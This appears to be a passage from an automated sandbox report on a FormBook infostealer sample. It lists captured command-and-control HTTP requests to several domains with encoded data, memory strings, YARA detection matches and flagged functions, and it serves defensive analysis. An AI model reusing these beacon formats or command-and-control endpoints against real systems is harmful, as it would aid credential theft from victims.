22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bc54f76cb33-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bd20dfdcb0d-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bdedcba9b83-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 1--Lt08NN.10.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 1--Lt08NN.10.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
Source: unknown DNS traffic detected: queries for: www.ope-cctv.com
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Yara signature match
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FF900 1_2_012FF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013CE824 1_2_013CE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1002 1_2_013B1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C20A8 1_2_013C20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B090 1_2_0130B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C28EC 1_2_013C28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2B28 1_2_013C2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AB40 1_2_0131AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0139CB4F 1_2_0139CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132EBB0 1_2_0132EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B03DA 1_2_013B03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BDBD2 1_2_013BDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132ABD8 1_2_0132ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFA2B 1_2_013AFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C22AE 1_2_013C22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F0D20 1_2_012F0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2D07 1_2_013C2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1D55 1_2_013C1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130D5E0 1_2_0130D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C25DD 1_2_013C25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130841F 1_2_0130841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BD466 1_2_013BD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1FF1 1_2_013C1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013CDFCE 1_2_013CDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01316E30 1_2_01316E30
